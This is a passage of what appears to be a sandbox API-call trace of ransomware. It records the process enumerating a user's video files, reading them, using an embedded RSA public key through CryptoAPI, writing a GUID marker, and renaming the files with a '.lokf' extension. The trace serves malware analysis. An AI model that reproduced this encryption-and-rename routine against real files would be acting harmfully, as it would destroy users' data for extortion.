[0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32995a0 | out: hHeap=0x660000) returned 1 [0061.016] WriteFile (in: hFile=0x5cc, lpBuffer=0x326aa18*, nNumberOfBytesToWrite=0x9fd, lpNumberOfBytesWritten=0x9f4fb14, lpOverlapped=0x0 | out: lpBuffer=0x326aa18*, lpNumberOfBytesWritten=0x9f4fb14*=0x9fd, lpOverlapped=0x0) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326aa18 | out: hHeap=0x660000) returned 1 [0061.016] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0xa02, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.016] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.016] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x326f5f0 | out: hHeap=0x660000) returned 1 [0061.016] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x60) returned 0x329bba0 [0061.016] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x428) returned 0x32947b0 [0061.017] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", cchWideChar=-1, lpMultiByteStr=0x32947b0, cbMultiByte=1064, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="x9IZw5wRneh1CTqwSVbPbGdvdDsYsxZaFaQPV9s9", lpUsedDefaultChar=0x0) returned 41 [0061.017] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x430) returned 0x3297a68 [0061.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329bba0 | out: hHeap=0x660000) returned 1 [0061.017] WriteFile (in: hFile=0x5cc, lpBuffer=0x3297a68*, nNumberOfBytesToWrite=0x28, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x3297a68*, lpNumberOfBytesWritten=0x9f4fb50*=0x28, lpOverlapped=0x0) returned 1 [0061.017] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3297a68 | out: hHeap=0x660000) returned 1 [0061.017] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.017] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.017] CloseHandle (hObject=0x5cc) returned 1 [0061.018] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0061.018] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0061.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3262c78 | out: hHeap=0x660000) returned 1 [0061.018] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\l-4D7O.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\l-4d7o.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\l-4D7O.mkv.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\l-4d7o.mkv.lokf")) returned 1 [0061.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3268798 | out: hHeap=0x660000) returned 1 [0061.018] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.018] VirtualFree (lpAddress=0x3700000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0061.019] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x31c46f0 | out: hHeap=0x660000) returned 1 [0061.019] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x29c4b460, ftCreationTime.dwHighDateTime=0x1d4c782, ftLastAccessTime.dwLowDateTime=0xdfaa98e0, ftLastAccessTime.dwHighDateTime=0x1d4c597, ftLastWriteTime.dwLowDateTime=0xdfaa98e0, ftLastWriteTime.dwHighDateTime=0x1d4c597, nFileSizeHigh=0x0, nFileSizeLow=0x14aba, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="LVSDJY.avi", cAlternateFileName="")) returned 1 [0061.019] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0061.019] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.019] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32adfd8 | out: hHeap=0x660000) returned 1 [0061.019] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\LVSDJY.avi") returned=".avi" [0061.019] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\LVSDJY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\lvsdjy.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.019] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=84666) returned 1 [0061.020] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.022] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14a94, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.022] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.023] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.023] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0061.023] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x14aba, lpOverlapped=0x0) returned 1 [0061.023] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.023] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.023] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.023] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.023] CryptAcquireContextW (in: phProv=0x9f4fa50, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x9f4fa50*=0x6b87a8) returned 1 [0061.024] CryptCreateHash (in: hProv=0x6b87a8, Algid=0x8003, hKey=0x0, dwFlags=0x0, phHash=0x9f4fa58 | out: phHash=0x9f4fa58) returned 1 [0061.024] CryptHashData (hHash=0x327cb80, pbData=0x32afc78, dwDataLen=0x1f2, dwFlags=0x0) returned 1 [0061.024] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x0, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x0, pdwDataLen=0x9f4fa54) returned 1 [0061.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x11) returned 0x3242688 [0061.024] CryptGetHashParam (in: hHash=0x327cb80, dwParam=0x2, pbData=0x3242688, pdwDataLen=0x9f4fa54, dwFlags=0x0 | out: pbData=0x3242688, pdwDataLen=0x9f4fa54) returned 1 [0061.024] GetLastError () returned 0x0 [0061.024] CryptDestroyHash (hHash=0x327cb80) returned 1 [0061.024] CryptReleaseContext (hProv=0x6b87a8, dwFlags=0x0) returned 1 [0061.024] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32afc78 | out: hHeap=0x660000) returned 1 [0061.024] UuidCreate (in: Uuid=0x9f4fa48 | out: Uuid=0x9f4fa48) returned 0x0 [0061.024] UuidToStringA (in: Uuid=0x9f4fa48, StringUuid=0x9f4fa40 | out: StringUuid=0x9f4fa40) returned 0x0 [0061.024] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.024] RpcStringFreeA (in: String=0x9f4fa40 | out: String=0x9f4fa40) returned 0x0 [0061.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257518 | out: hHeap=0x660000) returned 1 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14ac0) returned 0x9c8dae8 [0061.025] SetFilePointer (in: hFile=0x5cc, lDistanceToMove=5, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x5 [0061.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3257208 | out: hHeap=0x660000) returned 1 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32995a0 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257208 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f0) returned 0x32afc78 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x32964a0 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86ad0 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86178 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x40) returned 0x9c86b18 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c86190 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861c0 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861d8 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x24) returned 0x32a08a0 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x158) returned 0x9c78728 [0061.025] RtlReAllocateHeap (Heap=0x660000, Flags=0x0, Ptr=0x9c78728, Size=0x218) returned 0x9c711f0 [0061.025] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x558) returned 0x32947b0 [0061.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861c0 | out: hHeap=0x660000) returned 1 [0061.025] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861d8 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32a08a0 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32947b0 | out: hHeap=0x660000) returned 1 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278e90 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10) returned 0x9c861d8 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x18) returned 0x32425c8 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x9) returned 0x9c861c0 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f40 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x10e) returned 0x3234418 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x20) returned 0x328e3b0 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x58) returned 0x3296380 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242688 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x104) returned 0x32452d8 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x14) returned 0x3242348 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f60 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3234418 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861d8 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f40 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c861c0 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32425c8 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c857b8 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x328e3b0 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x32964a0 | out: hHeap=0x660000) returned 1 [0061.026] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x9c711f0 | out: hHeap=0x660000) returned 1 [0061.026] GetCurrentThreadId () returned 0x9e0 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f5f0 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x82) returned 0x9c8c1c0 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x2c) returned 0x3257198 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x80) returned 0x6b87a8 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x148) returned 0x3201228 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.026] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f40 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f800 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.027] GetCurrentThreadId () returned 0x9e0 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xeb) returned 0x329e1f0 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x64) returned 0x735b80 [0061.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x735b80 | out: hHeap=0x660000) returned 1 [0061.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x329e1f0 | out: hHeap=0x660000) returned 1 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326fa10 [0061.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278e90 | out: hHeap=0x660000) returned 1 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4c) returned 0x3261528 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278e90 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x100) returned 0x326f6f8 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c857b8 [0061.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f10 | out: hHeap=0x660000) returned 1 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f10 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f50 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f00 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f20 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278ec0 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f30 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x4) returned 0x3278f70 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xc) returned 0x9c861c0 [0061.027] HeapFree (in: hHeap=0x660000, dwFlags=0x0, lpMem=0x3278f50 | out: hHeap=0x660000) returned 1 [0061.027] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8) returned 0x3278f50 [0061.028] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x14aba, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.028] WriteFile (in: hFile=0x5cc, lpBuffer=0x326f5f0*, nNumberOfBytesToWrite=0x100, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x326f5f0*, lpNumberOfBytesWritten=0x9f4fb50*=0x100, lpOverlapped=0x0) returned 1 [0061.028] lstrlenA (lpString="{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}") returned 38 [0061.028] WriteFile (in: hFile=0x5cc, lpBuffer=0x504448*, nNumberOfBytesToWrite=0x26, lpNumberOfBytesWritten=0x9f4fb50, lpOverlapped=0x0 | out: lpBuffer=0x504448*, lpNumberOfBytesWritten=0x9f4fb50*=0x26, lpOverlapped=0x0) returned 1 [0061.028] CloseHandle (hObject=0x5cc) returned 1 [0061.029] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xa0) returned 0x3262c78 [0061.029] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x8b0) returned 0x3268798 [0061.029] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\LVSDJY.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\lvsdjy.avi"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\LVSDJY.avi.lokf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\lvsdjy.avi.lokf")) returned 1 [0061.030] FindNextFileW (in: hFindFile=0x68d798, lpFindFileData=0x9f4fba4 | out: lpFindFileData=0x9f4fba4*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xcb82f490, ftCreationTime.dwHighDateTime=0x1d4cefa, ftLastAccessTime.dwLowDateTime=0x6f71e2f0, ftLastAccessTime.dwHighDateTime=0x1d4d3ab, ftLastWriteTime.dwLowDateTime=0x6f71e2f0, ftLastWriteTime.dwHighDateTime=0x1d4d3ab, nFileSizeHigh=0x0, nFileSizeLow=0x4d04, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="olMX62ll.avi", cAlternateFileName="")) returned 1 [0061.030] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x90) returned 0x32adfd8 [0061.031] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0xd6) returned 0x31c46f0 [0061.031] PathFindExtensionW (pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\olMX62ll.avi") returned=".avi" [0061.031] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Videos\\27nF\\XeSTpd\\hWmlgmybmvGq Gv\\olMX62ll.avi" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\videos\\27nf\\xestpd\\hwmlgmybmvgq gv\\olmx62ll.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x5cc [0061.031] GetFileSizeEx (in: hFile=0x5cc, lpFileSize=0x9f4fb40 | out: lpFileSize=0x9f4fb40*=19716) returned 1 [0061.031] VirtualAlloc (lpAddress=0x0, dwSize=0x25815, flAllocationType=0x1000, flProtect=0x4) returned 0x3700000 [0061.033] SetFilePointerEx (in: hFile=0x5cc, liDistanceToMove=0x4cde, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0061.033] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x26, lpNumberOfBytesRead=0x9f4fb78, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb78*=0x26, lpOverlapped=0x0) returned 1 [0061.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x30) returned 0x3257518 [0061.034] ReadFile (in: hFile=0x5cc, lpBuffer=0x3700000, nNumberOfBytesToRead=0x25805, lpNumberOfBytesRead=0x9f4fb70, lpOverlapped=0x0 | out: lpBuffer=0x3700000*, lpNumberOfBytesRead=0x9f4fb70*=0x4d04, lpOverlapped=0x0) returned 1 [0061.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.034] RtlAllocateHeap (HeapHandle=0x660000, Flags=0x0, Size=0x1f2) returned 0x32afc78 [0061.034] lstrlenA (lpString="-----BEGIN PUBLIC KEY-----\\\\nMIIBIjANBgkqhkiG9w0BAQEFAAOCAQ8AMIIBCgKCAQEAu9kqEhvvBEg\\/tGe7WAxi\\\\nt4twI3w9WDB8OMR3bys2yk0W7ciJWvON3sN\\/DYbcqkpmFclEZ1NaGyCrGC72RRVp\\\\nMzwS5AFncLUSG9fK6vR7MOdMBnYppfykMW8BG7VZlt35sroHHO85+mG51mDsKVxS\\\\n3Et6VtnhEfclDM+1ZNPR1SL0+WzO0nUhCMtD\\/2q9V6RsdvYPZD8XWP062MaKYQV\\/\\\\ngfBYPUYlwcY5Yrl9QFfpt2Yd5TP8lVG8klmj8fuq5uBavvrCh2YQ+cUZQnoHAysD\\\\nuMcCVY5QNKxHyweZYUaUEdpYDZgVy4Xo0savvOsp0Vg0dQWYIvWkNKLTYAoyes4N\\\\nowIDAQAB\\\\n-----END PUBLIC KEY-----\\\\n") returned 493 [0061.034] lstrlenA (lpString="-----BEGIN PUBLIC 